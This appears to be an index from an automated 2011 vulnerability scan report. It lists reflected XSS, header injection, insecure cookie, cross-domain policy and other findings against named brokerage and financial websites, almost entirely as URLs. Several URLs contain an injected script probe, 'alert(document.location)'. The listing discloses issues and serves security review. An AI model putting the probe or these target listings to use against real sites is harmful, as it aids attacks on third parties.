XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09082011-01

Report generated by XSS.CX at Thu Sep 08 19:14:33 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. HTTP header injection

1.1. http://pixel.everesttech.net/2164/cq [url parameter]

1.2. http://www.interactivebrokers.co.uk/contract_info/index.php [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://360.sorensonmedia.com/api/getPlayerData [vguid parameter]

2.2. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

2.3. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

2.4. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

2.5. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.6. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard [mbox parameter]

2.7. http://transworld.websol.barchart.com/main.php [name of an arbitrarily supplied request parameter]

2.8. http://transworld.websol.barchart.com/main.php [page parameter]

2.9. http://webstation.barchart.com/eflogin.php [txtPassword parameter]

2.10. http://webstation.barchart.com/eflogin.php [txtUsername parameter]

2.11. https://www.barchart.com/register/realtime/css/_basicFormCSS.php [errorIds parameter]

2.12. http://www.efutures.com/faq.php [name of an arbitrarily supplied request parameter]

2.13. http://www.efutures.com/traders/news.php [name of an arbitrarily supplied request parameter]

2.14. http://www.futurestrading.com/managed-accounts/what-are-managed-futures.html [REST URL parameter 1]

2.15. http://www.globalfutures.com/index.asp [refid parameter]

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

2.17. http://www.interactivebrokers.com/mobile/index.php [name of an arbitrarily supplied request parameter]

2.18. http://www.interactivebrokers.com/mobile/index.php/images/btn_continuetowebsite.png [REST URL parameter 3]

2.19. http://www.interactivebrokers.com/mobile/index.php/images/btn_continuetowebsite.png [REST URL parameter 4]

2.20. http://www.interactivebrokers.com/mobile/index.php/images/btn_submit.png [REST URL parameter 3]

2.21. http://www.interactivebrokers.com/mobile/index.php/images/btn_submit.png [REST URL parameter 4]

2.22. http://www.interactivebrokers.com/mobile/index.php/images/request_app_iblogo.png [REST URL parameter 3]

2.23. http://www.interactivebrokers.com/mobile/index.php/images/request_app_iblogo.png [REST URL parameter 4]

2.24. http://www.interactivebrokers.com/mobile/index.php/m.css [REST URL parameter 3]

2.25. https://www.interactivebrokers.com/sso/Login [forwardTo parameter]

2.26. http://www.invest-store.com/cgi-bin/commoditybooks-bin/category.cgi [page parameter]

2.27. http://www.invest-store.com/cgi-bin/commoditybooks-bin/home.cgi [division parameter]

2.28. http://www2.daytrade4less.com/livesupport/image.php [l parameter]

2.29. http://www2.daytrade4less.com/livesupport/js/status_image.php [base_url parameter]

2.30. http://www.pfgbest.com/toolkit/ [Referer HTTP header]

2.31. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html [REST URL parameter 1]

3. Flash cross-domain policy

3.1. http://360.sorensonmedia.com/crossdomain.xml

3.2. http://cdn-static.viddler.com/crossdomain.xml

3.3. http://cdn-thumbs.viddler.com/crossdomain.xml

3.4. http://cdn.static.viddler.com/crossdomain.xml

3.5. http://cdnimages.sorensonmedia.com/crossdomain.xml

3.6. http://cdnvideos.sorensonmedia.com/crossdomain.xml

3.7. http://load.tubemogul.com/crossdomain.xml

3.8. http://optionsxpress.tt.omtrdc.net/crossdomain.xml

3.9. http://pixel.everesttech.net/crossdomain.xml

3.10. http://rcv-srv20.inplay.tubemogul.com/crossdomain.xml

3.11. http://receive.inplay.tubemogul.com/crossdomain.xml

3.12. http://static.cdn.360.sorensonmedia.com/crossdomain.xml

3.13. http://stats.optionsxpress.com/crossdomain.xml

3.14. http://tags.bluekai.com/crossdomain.xml

3.15. http://www.viddler.com/crossdomain.xml

3.16. http://206.106.137.34/crossdomain.xml

3.17. http://adadvisor.net/crossdomain.xml

3.18. https://adwords.google.com/crossdomain.xml

3.19. http://finance.yahoo.com/crossdomain.xml

3.20. http://picasaweb.google.com/crossdomain.xml

3.21. http://server.iad.liveperson.net/crossdomain.xml

3.22. https://server.iad.liveperson.net/crossdomain.xml

3.23. http://us.rd.yahoo.com/crossdomain.xml

3.24. http://www.adobe.com/crossdomain.xml

3.25. http://www.facebook.com/crossdomain.xml

3.26. http://www.nasdaqtrader.com/crossdomain.xml

3.27. http://www.thefinancials.com/crossdomain.xml

3.28. http://www.youtube.com/crossdomain.xml

3.29. https://account.optionsxpress.com/crossdomain.xml

3.30. https://docs.google.com/crossdomain.xml

3.31. http://pfgbest.app5.hubspot.com/crossdomain.xml

3.32. http://stats.manticoretechnology.com/crossdomain.xml

3.33. http://www.optionsxpress.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://contentcafe2.btol.com/clientaccesspolicy.xml

4.2. http://stats.optionsxpress.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://webstation.barchart.com/eflogin.php

5.2. http://www.futurestrading.com/log-in.html

6. SSL cookie without secure flag set

6.1. https://www.optionsxpress.com/new_account.asp

6.2. https://www.optionsxpress.com/new_account.asp

6.3. https://www.optionsxpress.com/welcome.asp

6.4. https://account.optionsxpress.com/OpenAccount/Index

6.5. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

6.6. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

6.7. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

6.8. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

6.9. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

6.10. https://account.optionsxpress.com/css/oxps.css

6.11. https://account.optionsxpress.com/favicon.ico

6.12. https://account.optionsxpress.com/images/btn_next_step.jpg

6.13. https://account.optionsxpress.com/images/icon_arrow.jpg

6.14. https://account.optionsxpress.com/images/icons/log_in.gif

6.15. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

6.16. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

6.17. https://account.optionsxpress.com/images/minus_new_acct.gif

6.18. https://account.optionsxpress.com/images/newaccount/account_select1.gif

6.19. https://account.optionsxpress.com/images/newaccount/account_select2.gif

6.20. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

6.21. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

6.22. https://account.optionsxpress.com/images/openAccount_bottom.jpg

6.23. https://account.optionsxpress.com/images/plus_new_acct.gif

6.24. https://account.optionsxpress.com/images/rightColumn_divider.jpg

6.25. https://account.optionsxpress.com/images/styles/bubble/b.gif

6.26. https://account.optionsxpress.com/images/styles/bubble/bl.gif

6.27. https://account.optionsxpress.com/images/styles/bubble/br.gif

6.28. https://account.optionsxpress.com/images/styles/bubble/l.gif

6.29. https://account.optionsxpress.com/images/styles/bubble/r.gif

6.30. https://account.optionsxpress.com/images/styles/bubble/t.gif

6.31. https://account.optionsxpress.com/images/styles/bubble/tl.gif

6.32. https://account.optionsxpress.com/images/styles/bubble/tr.gif

6.33. https://account.optionsxpress.com/images/welcome/home/log_out.gif

6.34. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

6.35. https://account.optionsxpress.com/inc/general.js

6.36. https://account.optionsxpress.com/inc/interface.js

6.37. https://account.optionsxpress.com/inc/js/plugins/accordion.js

6.38. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

6.39. https://account.optionsxpress.com/inc/newaccount/general.js

6.40. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

6.41. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

6.42. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

6.43. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

6.44. https://account.optionsxpress.com/inc/newaccount/styles.css

6.45. https://account.optionsxpress.com/inc/s_code.js

6.46. https://adwords.google.com/um/StartNewLogin

6.47. https://icewebinar.webex.com/icewebinar/lsr.php

6.48. https://interactivebrokers.webex.com/interactivebrokers/lsr.php

6.49. https://interactivebrokers.webex.com/interactivebrokers/onstage/g.php

6.50. https://www.cqgtrader.com/Languages/USEng/main.asp

6.51. https://www.optionsxpress.com/downloads/financial_services_guide.pdf

6.52. https://www.optionsxpress.com/login.asp

6.53. https://www.pfgboss.com/Default.aspx

6.54. https://www.secureclient5.ranweb.com/login/ranweb.asp

7. Session token in URL

7.1. https://account.optionsxpress.com/inc/interface.js

7.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

7.3. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard

7.4. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Logout

7.5. https://www.interactivebrokers.com/cstools/ib_app_help/

8. SSL certificate

8.1. https://cwt1.interactivebrokers.com/

8.2. https://www.barchart.com/

8.3. https://www.cqgtrader.com/

8.4. https://www.efutures.com/

8.5. https://www.interactivebrokers.com/

8.6. https://account.optionsxpress.com/

8.7. https://adwords.google.com/

8.8. https://docs.google.com/

8.9. https://icewebinar.webex.com/

8.10. https://interactivebrokers.webex.com/

8.11. https://mail.google.com/

8.12. https://online.optionsxpress.ca/

8.13. https://online.optionsxpress.com.sg/

8.14. https://online.optionsxpress.eu/

8.15. https://onlineint.optionsxpress.com/

8.16. https://seal.verisign.com/

8.17. https://server.iad.liveperson.net/

8.18. https://sites.google.com/

8.19. https://www.google.com/

8.20. https://www.optionsxpress.com/

8.21. https://www.optionsxpress.com.au/

8.22. https://www.pfgboss.com/

8.23. https://www.secureclient5.ranweb.com/

9. Cookie scoped to parent domain

9.1. http://pixel.everesttech.net/2164/cq

9.2. https://account.optionsxpress.com/OpenAccount/Index

9.3. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

9.4. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

9.5. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

9.6. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

9.7. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

9.8. https://account.optionsxpress.com/css/oxps.css

9.9. https://account.optionsxpress.com/favicon.ico

9.10. https://account.optionsxpress.com/images/btn_next_step.jpg

9.11. https://account.optionsxpress.com/images/icon_arrow.jpg

9.12. https://account.optionsxpress.com/images/icons/log_in.gif

9.13. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

9.14. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

9.15. https://account.optionsxpress.com/images/minus_new_acct.gif

9.16. https://account.optionsxpress.com/images/newaccount/account_select1.gif

9.17. https://account.optionsxpress.com/images/newaccount/account_select2.gif

9.18. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

9.19. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

9.20. https://account.optionsxpress.com/images/openAccount_bottom.jpg

9.21. https://account.optionsxpress.com/images/plus_new_acct.gif

9.22. https://account.optionsxpress.com/images/rightColumn_divider.jpg

9.23. https://account.optionsxpress.com/images/styles/bubble/b.gif

9.24. https://account.optionsxpress.com/images/styles/bubble/bl.gif

9.25. https://account.optionsxpress.com/images/styles/bubble/br.gif

9.26. https://account.optionsxpress.com/images/styles/bubble/l.gif

9.27. https://account.optionsxpress.com/images/styles/bubble/r.gif

9.28. https://account.optionsxpress.com/images/styles/bubble/t.gif

9.29. https://account.optionsxpress.com/images/styles/bubble/tl.gif

9.30. https://account.optionsxpress.com/images/styles/bubble/tr.gif

9.31. https://account.optionsxpress.com/images/welcome/home/log_out.gif

9.32. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

9.33. https://account.optionsxpress.com/inc/general.js

9.34. https://account.optionsxpress.com/inc/interface.js

9.35. https://account.optionsxpress.com/inc/js/plugins/accordion.js

9.36. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

9.37. https://account.optionsxpress.com/inc/newaccount/general.js

9.38. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

9.39. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

9.40. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

9.41. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

9.42. https://account.optionsxpress.com/inc/newaccount/styles.css

9.43. https://account.optionsxpress.com/inc/s_code.js

9.44. http://rcv-srv20.inplay.tubemogul.com/StreamReceiver/services

9.45. http://receive.inplay.tubemogul.com/StreamReceiver/demo

9.46. http://rtd.tubemogul.com/upi/pid/5w3jqr4k

9.47. http://server.iad.liveperson.net/hc/82583755/

9.48. http://shared.websol.barchart.com/css/bc_styles.css

9.49. http://www.facebook.com/dialog/feed

9.50. http://www.interactivebrokers.com/mkt/index.php

9.51. https://www.interactivebrokers.com/sso/Login

9.52. http://www.optionsxpress.com/

9.53. http://www.optionsxpress.com/404.aspx

9.54. http://www.optionsxpress.com/about_us/awards_media.aspx

9.55. http://www.optionsxpress.com/about_us/contact_us.aspx

9.56. http://www.optionsxpress.com/about_us/faq.aspx

9.57. http://www.optionsxpress.com/about_us/pricing_commissions.aspx

9.58. http://www.optionsxpress.com/check_us_out/right_for_you.aspx

9.59. http://www.optionsxpress.com/check_us_out/site_map.aspx

9.60. http://www.optionsxpress.com/corporate/about_us.aspx

9.61. http://www.optionsxpress.com/favicon.ico

9.62. http://www.optionsxpress.com/free_education/education_center.aspx

9.63. http://www.optionsxpress.com/free_education/live_events/

9.64. http://www.optionsxpress.com/free_education/virtual_trade.aspx

9.65. http://www.optionsxpress.com/images/promo_static/ox.gif

9.66. http://www.optionsxpress.com/images/promo_unique/divider.jpg

9.67. http://www.optionsxpress.com/images/promo_unique/live-help.jpg

9.68. http://www.optionsxpress.com/images/promo_unique/phone.jpg

9.69. http://www.optionsxpress.com/images/promo_unique/shadow.png

9.70. http://www.optionsxpress.com/images/promos/allInOne.png

9.71. http://www.optionsxpress.com/images/promos/barronsBg.png

9.72. http://www.optionsxpress.com/images/promos/chartC4c.jpg

9.73. http://www.optionsxpress.com/images/promos/footer1Logo11.png

9.74. http://www.optionsxpress.com/images/promos/kiplingerBg.png

9.75. http://www.optionsxpress.com/images/promos/mainBottom.png

9.76. http://www.optionsxpress.com/images/promos/toolsIcons.png

9.77. http://www.optionsxpress.com/images/promos/whiteboard_sales_lp.png

9.78. http://www.optionsxpress.com/images/ui/ui-bg_glass_65_ffffff_1x400.png

9.79. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png

9.80. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_125697_1x100.png

9.81. http://www.optionsxpress.com/images/welcome/home/log_out.gif

9.82. http://www.optionsxpress.com/images/welcome/home/open_account_4.gif

9.83. http://www.optionsxpress.com/inc/css/fonts.css

9.84. http://www.optionsxpress.com/inc/css/nav.css

9.85. http://www.optionsxpress.com/inc/css/print.css

9.86. http://www.optionsxpress.com/inc/css/screen.css

9.87. http://www.optionsxpress.com/inc/css/styles.css

9.88. http://www.optionsxpress.com/inc/css/ui.css

9.89. http://www.optionsxpress.com/inc/general.js

9.90. http://www.optionsxpress.com/inc/js/library.js

9.91. http://www.optionsxpress.com/inc/js/stats.js

9.92. http://www.optionsxpress.com/inc/js/xpress.js

9.93. http://www.optionsxpress.com/index.aspx

9.94. http://www.optionsxpress.com/our_products/futures.aspx

9.95. http://www.optionsxpress.com/our_products/more_choices.aspx

9.96. http://www.optionsxpress.com/our_products/options.aspx

9.97. http://www.optionsxpress.com/our_products/stocks.aspx

9.98. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

9.99. http://www.optionsxpress.com/promos/none

9.100. http://www.optionsxpress.com/security_risks/disclosures.aspx

9.101. http://www.optionsxpress.com/security_risks/docs/privacy.aspx

9.102. http://www.optionsxpress.com/security_risks/financial_statement.aspx

9.103. http://www.optionsxpress.com/security_risks/risks_policies.aspx

9.104. http://www.optionsxpress.com/security_risks/security_center.aspx

9.105. http://www.optionsxpress.com/tools_research/ox_mobile.aspx

9.106. http://www.optionsxpress.com/tools_research/powerful_tools.aspx

9.107. http://www.optionsxpress.com/tools_research/xtend_2.aspx

9.108. http://www.optionsxpress.com/what_we_offer/free_account_transfers.aspx

9.109. http://www.optionsxpress.com/why_ox/

9.110. https://www.optionsxpress.com/downloads/financial_services_guide.pdf

9.111. https://www.optionsxpress.com/login.asp

9.112. https://www.optionsxpress.com/welcome.asp

9.113. http://www.youtube.com/results

10. Cookie without HttpOnly flag set

10.1. http://pixel.everesttech.net/2164/cq

10.2. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Login

10.3. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Logout

10.4. https://www.interactivebrokers.com/Universal/servlet/Registration_v3.formScreenPreReg

10.5. https://www.interactivebrokers.com/Universal/servlet/formWelcome

10.6. https://www.interactivebrokers.com/sso/Authenticator

10.7. https://www.interactivebrokers.com/sso/Login

10.8. https://www.optionsxpress.com/new_account.asp

10.9. https://www.optionsxpress.com/new_account.asp

10.10. https://www.optionsxpress.com/welcome.asp

10.11. http://360.sorensonmedia.com/7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js

10.12. https://account.optionsxpress.com/OpenAccount/Index

10.13. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

10.14. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

10.15. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

10.16. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

10.17. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

10.18. https://account.optionsxpress.com/css/oxps.css

10.19. https://account.optionsxpress.com/favicon.ico

10.20. https://account.optionsxpress.com/images/btn_next_step.jpg

10.21. https://account.optionsxpress.com/images/icon_arrow.jpg

10.22. https://account.optionsxpress.com/images/icons/log_in.gif

10.23. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

10.24. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

10.25. https://account.optionsxpress.com/images/minus_new_acct.gif

10.26. https://account.optionsxpress.com/images/newaccount/account_select1.gif

10.27. https://account.optionsxpress.com/images/newaccount/account_select2.gif

10.28. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

10.29. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

10.30. https://account.optionsxpress.com/images/openAccount_bottom.jpg

10.31. https://account.optionsxpress.com/images/plus_new_acct.gif

10.32. https://account.optionsxpress.com/images/rightColumn_divider.jpg

10.33. https://account.optionsxpress.com/images/styles/bubble/b.gif

10.34. https://account.optionsxpress.com/images/styles/bubble/bl.gif

10.35. https://account.optionsxpress.com/images/styles/bubble/br.gif

10.36. https://account.optionsxpress.com/images/styles/bubble/l.gif

10.37. https://account.optionsxpress.com/images/styles/bubble/r.gif

10.38. https://account.optionsxpress.com/images/styles/bubble/t.gif

10.39. https://account.optionsxpress.com/images/styles/bubble/tl.gif

10.40. https://account.optionsxpress.com/images/styles/bubble/tr.gif

10.41. https://account.optionsxpress.com/images/welcome/home/log_out.gif

10.42. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

10.43. https://account.optionsxpress.com/inc/general.js

10.44. https://account.optionsxpress.com/inc/interface.js

10.45. https://account.optionsxpress.com/inc/js/plugins/accordion.js

10.46. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

10.47. https://account.optionsxpress.com/inc/newaccount/general.js

10.48. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

10.49. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

10.50. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

10.51. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

10.52. https://account.optionsxpress.com/inc/newaccount/styles.css

10.53. https://account.optionsxpress.com/inc/s_code.js

10.54. https://adwords.google.com/um/StartNewLogin

10.55. https://cwt1.interactivebrokers.com/webtrader2/servlet/login

10.56. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

10.57. http://finance.yahoo.com/news/Piedmont-Natural-Gas-prnews-2212692382.html

10.58. http://finance.yahoo.com/news/Primary-Petroleum-Present-iw-1675004773.html

10.59. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html

10.60. http://finance.yahoo.com/news/US-Steel-converts-vehicles-to-apf-2954052497.html

10.61. https://icewebinar.webex.com/icewebinar/lsr.php

10.62. https://interactivebrokers.webex.com/interactivebrokers/lsr.php

10.63. https://interactivebrokers.webex.com/interactivebrokers/onstage/g.php

10.64. http://pfgbest.app5.hubspot.com/salog.js.aspx

10.65. http://rcv-srv20.inplay.tubemogul.com/StreamReceiver/services

10.66. http://receive.inplay.tubemogul.com/StreamReceiver/demo

10.67. http://rtd.tubemogul.com/upi/pid/5w3jqr4k

10.68. http://server.iad.liveperson.net/hc/82583755/

10.69. http://server.iad.liveperson.net/hc/82583755/

10.70. http://shared.websol.barchart.com/css/bc_styles.css

10.71. http://stats.manticoretechnology.com/Data/578/12867/3756E06F-E585-4584-AC1F-E9FCA21FAC0F/mtcLogData.asp

10.72. http://www.cqgtrader.com/

10.73. http://www.cqgtrader.com/Languages/USEng/main.asp

10.74. https://www.cqgtrader.com/Languages/USEng/main.asp

10.75. http://www.facebook.com/dialog/feed

10.76. http://www.globalfutures.com/index.asp

10.77. http://www.googleadservices.com/pagead/aclk

10.78. http://www.interactivebrokers.co.uk/favicon.ico

10.79. http://www.interactivebrokers.com/mkt/index.php

10.80. http://www.invest-store.com/images/button.gif

10.81. http://www.invest-store.com/images/go_button.gif

10.82. http://www.invest-store.com/images/mi_button.gif

10.83. http://www.invest-store.com/images/small/5197574.jpg

10.84. http://www.invest-store.com/images/small/8024.jpg

10.85. http://www.invest-store.com/images/small/9349587.jpg

10.86. http://www.invest-store.com/images/spacer1.gif

10.87. http://www.optionsxpress.com/

10.88. http://www.optionsxpress.com/404.aspx

10.89. http://www.optionsxpress.com/about_us/awards_media.aspx

10.90. http://www.optionsxpress.com/about_us/contact_us.aspx

10.91. http://www.optionsxpress.com/about_us/faq.aspx

10.92. http://www.optionsxpress.com/about_us/pricing_commissions.aspx

10.93. http://www.optionsxpress.com/check_us_out/right_for_you.aspx

10.94. http://www.optionsxpress.com/check_us_out/site_map.aspx

10.95. http://www.optionsxpress.com/corporate/about_us.aspx

10.96. http://www.optionsxpress.com/favicon.ico

10.97. http://www.optionsxpress.com/free_education/education_center.aspx

10.98. http://www.optionsxpress.com/free_education/live_events/

10.99. http://www.optionsxpress.com/free_education/virtual_trade.aspx

10.100. http://www.optionsxpress.com/images/promo_static/ox.gif

10.101. http://www.optionsxpress.com/images/promo_unique/divider.jpg

10.102. http://www.optionsxpress.com/images/promo_unique/live-help.jpg

10.103. http://www.optionsxpress.com/images/promo_unique/phone.jpg

10.104. http://www.optionsxpress.com/images/promo_unique/shadow.png

10.105. http://www.optionsxpress.com/images/promos/allInOne.png

10.106. http://www.optionsxpress.com/images/promos/barronsBg.png

10.107. http://www.optionsxpress.com/images/promos/chartC4c.jpg

10.108. http://www.optionsxpress.com/images/promos/footer1Logo11.png

10.109. http://www.optionsxpress.com/images/promos/kiplingerBg.png

10.110. http://www.optionsxpress.com/images/promos/mainBottom.png

10.111. http://www.optionsxpress.com/images/promos/toolsIcons.png

10.112. http://www.optionsxpress.com/images/promos/whiteboard_sales_lp.png

10.113. http://www.optionsxpress.com/images/ui/ui-bg_glass_65_ffffff_1x400.png

10.114. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png

10.115. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_125697_1x100.png

10.116. http://www.optionsxpress.com/images/welcome/home/log_out.gif

10.117. http://www.optionsxpress.com/images/welcome/home/open_account_4.gif

10.118. http://www.optionsxpress.com/inc/css/fonts.css

10.119. http://www.optionsxpress.com/inc/css/nav.css

10.120. http://www.optionsxpress.com/inc/css/print.css

10.121. http://www.optionsxpress.com/inc/css/screen.css

10.122. http://www.optionsxpress.com/inc/css/styles.css

10.123. http://www.optionsxpress.com/inc/css/ui.css

10.124. http://www.optionsxpress.com/inc/general.js

10.125. http://www.optionsxpress.com/inc/js/library.js

10.126. http://www.optionsxpress.com/inc/js/stats.js

10.127. http://www.optionsxpress.com/inc/js/xpress.js

10.128. http://www.optionsxpress.com/index.aspx

10.129. http://www.optionsxpress.com/our_products/futures.aspx

10.130. http://www.optionsxpress.com/our_products/more_choices.aspx

10.131. http://www.optionsxpress.com/our_products/options.aspx

10.132. http://www.optionsxpress.com/our_products/stocks.aspx

10.133. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

10.134. http://www.optionsxpress.com/promos/none

10.135. http://www.optionsxpress.com/security_risks/disclosures.aspx

10.136. http://www.optionsxpress.com/security_risks/docs/privacy.aspx

10.137. http://www.optionsxpress.com/security_risks/financial_statement.aspx

10.138. http://www.optionsxpress.com/security_risks/risks_policies.aspx

10.139. http://www.optionsxpress.com/security_risks/security_center.aspx

10.140. http://www.optionsxpress.com/tools_research/ox_mobile.aspx

10.141. http://www.optionsxpress.com/tools_research/powerful_tools.aspx

10.142. http://www.optionsxpress.com/tools_research/xtend_2.aspx

10.143. http://www.optionsxpress.com/what_we_offer/free_account_transfers.aspx

10.144. http://www.optionsxpress.com/why_ox/

10.145. https://www.optionsxpress.com/downloads/financial_services_guide.pdf

10.146. https://www.optionsxpress.com/login.asp

10.147. https://www.secureclient5.ranweb.com/login/ranweb.asp

10.148. http://www.youtube.com/results

11. Password field with autocomplete enabled

11.1. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

11.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

11.3. https://cwt1.interactivebrokers.com/webtrader2/servlet/login

11.4. http://webstation.barchart.com/eflogin.php

11.5. https://www.barchart.com/register/realtime/

11.6. http://www.facebook.com/connect/prompt_feed.php

11.7. http://www.facebook.com/dialog/feed

11.8. http://www.futurestrading.com/log-in.html

11.9. https://www.pfgboss.com/Default.aspx

11.10. https://www.secureclient5.ranweb.com/login/ranweb.asp

12. Source code disclosure

12.1. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

12.2. http://www.interactivebrokers.com/en/p.php

13. ASP.NET debugging enabled

13.1. https://account.optionsxpress.com/Default.aspx

13.2. https://online.optionsxpress.ca/Default.aspx

13.3. https://online.optionsxpress.com.sg/Default.aspx

13.4. https://online.optionsxpress.eu/Default.aspx

13.5. http://www.optionsxpress.com/Default.aspx

13.6. http://www.thefinancials.com/Default.aspx

14. Referer-dependent response

14.1. http://www.futurestrading.com/templates/system/css/error.css

14.2. http://www.viddler.com/player/cc4ac375/

15. Cross-domain POST

16. Cross-domain Referer leakage

16.1. https://account.optionsxpress.com/OpenAccount/Index

16.2. http://cm.g.doubleclick.net/pixel

16.3. http://pixel.everesttech.net/2164/cq

16.4. http://shared.websol.barchart.com/text/disclaimer.php

16.5. http://www.algoadvantage.com/

16.6. http://www.efutures.com/

16.7. http://www.farrdirect.com/

16.8. http://www.globalfutures.com/index.asp

16.9. http://www.google.com/search

16.10. http://www.interactivebrokers.com/en/accounts/advisors/advisorsMain.php

16.11. http://www.interactivebrokers.com/en/accounts/advisors/employeeTrackMain.php

16.12. http://www.interactivebrokers.com/en/accounts/brokers/brokerMain.php

16.13. http://www.interactivebrokers.com/en/accounts/institutions/fundMain.php

16.14. http://www.interactivebrokers.com/en/accounts/institutions/institutionalMain.php

16.15. http://www.interactivebrokers.com/en/general/about/awards.php

16.16. http://www.interactivebrokers.com/en/general/education/OptPriceAgreement.php

16.17. http://www.interactivebrokers.com/en/general/education/comparebrokers.php

16.18. http://www.interactivebrokers.com/en/general/education/webinars.php

16.19. http://www.interactivebrokers.com/en/general/notifications/ibchanges.php

16.20. http://www.interactivebrokers.com/en/p.php

16.21. http://www.interactivebrokers.com/en/p.php

16.22. http://www.interactivebrokers.com/en/p.php

16.23. http://www.interactivebrokers.com/en/p.php

16.24. http://www.interactivebrokers.com/en/p.php

16.25. http://www.interactivebrokers.com/en/p.php

16.26. http://www.interactivebrokers.com/en/p.php

16.27. http://www.interactivebrokers.com/en/pagemap/pagemap_education.php

16.28. http://www.interactivebrokers.com/en/pagemap/pagemap_newaccounts.php

16.29. http://www.interactivebrokers.com/en/site_map.php

16.30. http://www.interactivebrokers.com/en/software/downloadPlugin.php

16.31. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-FxTrader.php

16.32. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-TechAnalytics.php

16.33. http://www.interactivebrokers.com/en/software/systemStatus.php

16.34. http://www.interactivebrokers.com/en/software/twsDisclaimer.php

16.35. http://www.interactivebrokers.com/en/software/twsTutorial.php

16.36. http://www.interactivebrokers.com/en/trading/pdfhighlights/PDF-Forex.php

16.37. http://www.interactivebrokers.com/en/trading/pdfhighlights/PDF-OptionsDesk.php

16.38. http://www.invest-store.com/btc/

16.39. http://www.invest-store.com/cgi-bin/commoditybooks-bin/home.cgi

16.40. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

16.41. http://www.zumo.com/

17. Cross-domain script include

17.1. https://account.optionsxpress.com/OpenAccount/Index

17.2. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

17.3. http://finance.yahoo.com/news/Piedmont-Natural-Gas-prnews-2212692382.html

17.4. http://finance.yahoo.com/news/Primary-Petroleum-Present-iw-1675004773.html

17.5. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html

